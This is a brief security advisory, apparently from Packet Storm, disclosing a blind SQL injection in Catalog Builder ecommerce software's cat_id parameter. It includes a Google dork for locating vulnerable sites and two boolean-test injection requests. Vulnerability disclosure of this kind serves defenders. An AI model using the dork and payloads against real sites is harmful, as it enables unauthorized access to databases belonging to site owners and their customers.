Catalog Builder Ecommerce Software suffers from a remote blind SQL injection vulnerability.
3df96bf5d62f699c6baa24fc854ff38e301e72d6f21d5b4ca4a33470d1ec10f4+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------
vulnerable url:
/catalog/main.php?cat_id=[blind sqli]
example:
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed